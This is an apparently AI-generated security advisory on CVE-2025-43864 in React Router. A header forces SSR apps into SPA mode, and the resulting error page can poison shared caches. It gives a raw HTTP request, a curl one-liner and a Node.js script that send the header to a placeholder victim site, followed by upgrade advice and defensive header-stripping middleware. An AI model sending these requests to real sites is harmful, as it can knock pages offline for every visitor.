## Summary
In the world of modern web apps, *React Router* is a vital tool for handling navigation in React projects. However, a newly discovered vulnerability, CVE-2025-43864, poses a major risk to developers using server-side rendering (SSR) with React Router versions from 7.2. up to, but not including, 7.5.2. This exploit allows attackers to force a site into single-page application (SPA) mode with a simple HTTP header, potentially crashing the site and poisoning its cache, making recovery difficult.
## What is the React Router Vulnerability?
React Router lets you decide if you want client-side navigation (SPA) or server-side rendering (SSR). By default, apps pick the right mode based on headers from the browser.
Starting with version 7.2., a new behavior opened the door to abuse: by sending a specially crafted request with a custom HTTP header, attackers can force the app to switch to SPA mode even when it should be using SSR. When this happens, SSR-specific context is lost and React Router throws a fatal error. This is bad enough, but when the error response gets cached (for example, by Varnish, Redis, or other CDN caches), every user gets served the broken page.
### 1. The Attack
An attacker sends a request to a route normally rendered via SSR, but adds a special x-react-router header:
```http
GET /important-page HTTP/1.1
Host: example.com
x-react-router: spa
```
React Router sees this header and switches to SPA mode—even in an environment meant for SSR. Now, the rendering process fails and an error page is generated.
### 2. Cache Poisoning
If the server uses an HTTP cache, it saves this broken response. Now, every subsequent visitor who requests /important-page gets the corrupted page, not the expected content. This is classic cache poisoning and hurts the availability of the app.
Here’s a simple curl command that can trigger the vulnerability:

```bash
curl -H "x-react-router: spa" https://victim-site.com/sensitive-ssr-route
```

If the site is vulnerable, uses SSR, and has a cache layer, this request might break the page for everyone for as long as the cached entry lives.
### Node.js demonstration
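```javascript
const https = require('https');

// Request options: the SSR route plus the header that forces SPA mode
const options = {
  hostname: 'victim-site.com',
  path: '/profile',
  headers: {
    'x-react-router': 'spa'
  }
};

// Send the request and print the response body once it has fully arrived
https.get(options, res => {
  let data = '';
  res.on('data', chunk => data += chunk);
  res.on('end', () => {
    console.log(data);
  });
});
```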
Difficult recovery: Cache might serve the error for hours.
## How to Fix / Mitigate
- Update React Router to 7.5.2 or later immediately (see the NPM changelog).
- If you have to stay on an old version, reject or ignore headers like x-react-router for public traffic.
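
One way to apply the second mitigation in a Node server that cannot be upgraded yet, as an added example (not code from React Router or from the advisory). The names `BLOCKED_PREFIX`, `stripRouterHeaders` and `harden` are hypothetical, the prefix match is an assumption based on the wording "headers like x-react-router", and marking 5xx responses `no-store` is an extra measure so a shared cache does not keep an error page.

```javascript
// Added example; names below are hypothetical, not React Router APIs.
// Prefix taken from the article's wording ("headers like x-react-router").
const BLOCKED_PREFIX = 'x-react-router';

// Drop matching headers from both views Node keeps on an incoming request:
// req.headers (lower-cased object) and req.rawHeaders ([name, value, ...]).
function stripRouterHeaders(req) {
  const removed = [];
  for (const name of Object.keys(req.headers || {})) {
    if (name.toLowerCase().startsWith(BLOCKED_PREFIX)) {
      removed.push(name.toLowerCase());
      delete req.headers[name];
    }
  }
  const raw = req.rawHeaders || [];
  const kept = [];
  for (let i = 0; i + 1 < raw.length; i += 2) {
    if (!raw[i].toLowerCase().startsWith(BLOCKED_PREFIX)) {
      kept.push(raw[i], raw[i + 1]);
    }
  }
  raw.splice(0, raw.length, ...kept); // edit in place so the request keeps one array
  return removed;
}

// Wrap a (req, res) handler: strip the headers, report what was removed,
// and mark any 5xx response uncacheable before its status line is written.
function harden(handler, log = () => {}) {
  return function hardened(req, res) {
    const removed = stripRouterHeaders(req);
    if (removed.length > 0) {
      log({ event: 'blocked-router-header', url: req.url, removed });
    }
    const writeHead = res.writeHead;
    res.writeHead = function (status, ...rest) {
      if (status >= 500) this.setHeader('Cache-Control', 'no-store');
      return writeHead.call(this, status, ...rest);
    };
    return handler(req, res);
  };
}

// Usage with the built-in server (ssrHandler stands for the app's own listener):
//   require('http').createServer(harden(ssrHandler, console.warn)).listen(3000);
```

Headers passed directly to `writeHead` take precedence over ones set with `setHeader`, so a handler that supplies its own `Cache-Control` there needs the same 5xx check. Stripping the header at the edge proxy or CDN as well keeps it from reaching the origin at all.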
Patch now to version 7.5.2 or higher and clear your cache after updating.
Stay safe—keep your dependencies updated and be aware of how HTTP headers can influence your app's behavior.
*This article is original content by AI, prepared based on the latest information about CVE-2025-43864. Please verify all details and test in your own environment.*
## Timeline
Published on: 04/25/2025 01:15:43 UTC
Last modified on: 04/29/2025 13:52:28 UTC